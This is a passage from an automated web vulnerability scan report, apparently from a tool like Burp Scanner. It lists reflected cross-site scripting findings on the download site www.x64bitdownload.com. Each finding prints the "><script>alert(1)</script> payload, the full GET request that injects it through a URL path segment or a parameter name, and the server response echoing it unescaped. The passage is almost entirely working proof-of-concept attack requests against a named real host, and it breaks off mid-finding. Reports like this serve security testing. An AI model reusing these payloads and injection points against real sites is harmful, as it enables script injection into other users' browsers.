<input type="hidden" name="retpage" value="/categories/free-64-bit-desktop-downloads-4-0-d.html?b3aea"><script>alert(1)</script>baafb6db136=1" />
...[SNIP]...

4.1674. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec4b"><script>alert(1)</script>598f0083468 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories2ec4b"><script>alert(1)</script>598f0083468/free-64-bit-development-downloads-5-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:33:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories2ec4b"><script>alert(1)</script>598f0083468/free-64-bit-development-downloads-5-0-d.html" />
...[SNIP]...

4.1675. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b81e"><script>alert(1)</script>bcc56172be7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-development-downloads-5-0-d.html5b81e"><script>alert(1)</script>bcc56172be7 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-development-downloads-5-0-d.html5b81e"><script>alert(1)</script>bcc56172be7" />
...[SNIP]...

4.1676. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7654"><script>alert(1)</script>5fed9989261 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-development-downloads-5-0-d.html?d7654"><script>alert(1)</script>5fed9989261=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-development-downloads-5-0-d.html?d7654"><script>alert(1)</script>5fed9989261=1" />
...[SNIP]...

4.1677. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d364"><script>alert(1)</script>136359d2933 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories1d364"><script>alert(1)</script>136359d2933/free-64-bit-education-downloads-6-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories1d364"><script>alert(1)</script>136359d2933/free-64-bit-education-downloads-6-0-d.html" />
...[SNIP]...

4.1678. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8f59"><script>alert(1)</script>ff671245bd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-education-downloads-6-0-d.htmlf8f59"><script>alert(1)</script>ff671245bd6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74597


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-education-downloads-6-0-d.htmlf8f59"><script>alert(1)</script>ff671245bd6" />
...[SNIP]...

4.1679. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bca"><script>alert(1)</script>6ff9196ddc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-education-downloads-6-0-d.html?b4bca"><script>alert(1)</script>6ff9196ddc8=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74600


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-education-downloads-6-0-d.html?b4bca"><script>alert(1)</script>6ff9196ddc8=1" />
...[SNIP]...

4.1680. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d9ce"><script>alert(1)</script>2ed7bbf475d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories8d9ce"><script>alert(1)</script>2ed7bbf475d/free-64-bit-games-entertainment-downloads-7-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:34:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories8d9ce"><script>alert(1)</script>2ed7bbf475d/free-64-bit-games-entertainment-downloads-7-0-d.html" />
...[SNIP]...

4.1681. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e40"><script>alert(1)</script>ceaef40d2d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.htmle3e40"><script>alert(1)</script>ceaef40d2d6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86760


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-games-entertainment-downloads-7-0-d.htmle3e40"><script>alert(1)</script>ceaef40d2d6" />
...[SNIP]...

4.1682. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a05c7"><script>alert(1)</script>0644b46147f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.html?a05c7"><script>alert(1)</script>0644b46147f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86763


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-games-entertainment-downloads-7-0-d.html?a05c7"><script>alert(1)</script>0644b46147f=1" />
...[SNIP]...

4.1683. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17d7f"><script>alert(1)</script>2644ecf6c0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories17d7f"><script>alert(1)</script>2644ecf6c0e/free-64-bit-graphic-apps-downloads-8-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:35:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories17d7f"><script>alert(1)</script>2644ecf6c0e/free-64-bit-graphic-apps-downloads-8-0-d.html" />
...[SNIP]...

4.1684. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a94a6"><script>alert(1)</script>4f8ac4abfac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.htmla94a6"><script>alert(1)</script>4f8ac4abfac HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-graphic-apps-downloads-8-0-d.htmla94a6"><script>alert(1)</script>4f8ac4abfac" />
...[SNIP]...

4.1685. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c898"><script>alert(1)</script>5c39625c5a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.html?6c898"><script>alert(1)</script>5c39625c5a2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81073


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-graphic-apps-downloads-8-0-d.html?6c898"><script>alert(1)</script>5c39625c5a2=1" />
...[SNIP]...

4.1686. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe96"><script>alert(1)</script>9b581e63618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesbfe96"><script>alert(1)</script>9b581e63618/free-64-bit-home-hobby-downloads-9-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:36:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesbfe96"><script>alert(1)</script>9b581e63618/free-64-bit-home-hobby-downloads-9-0-d.html" />
...[SNIP]...

4.1687. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb1e1"><script>alert(1)</script>16ffae90b65 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-home-hobby-downloads-9-0-d.htmlbb1e1"><script>alert(1)</script>16ffae90b65 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-home-hobby-downloads-9-0-d.htmlbb1e1"><script>alert(1)</script>16ffae90b65" />
...[SNIP]...

4.1688. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c50ab"><script>alert(1)</script>641fff062a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-home-hobby-downloads-9-0-d.html?c50ab"><script>alert(1)</script>641fff062a5=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90210


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-home-hobby-downloads-9-0-d.html?c50ab"><script>alert(1)</script>641fff062a5=1" />
...[SNIP]...

4.1689. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee9dc"><script>alert(1)</script>c8edc30f815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesee9dc"><script>alert(1)</script>c8edc30f815/free-64-bit-multimedia-design-downloads-258-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:37:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesee9dc"><script>alert(1)</script>c8edc30f815/free-64-bit-multimedia-design-downloads-258-0-d.html" />
...[SNIP]...

4.1690. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a5b9"><script>alert(1)</script>2ee9fead789 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

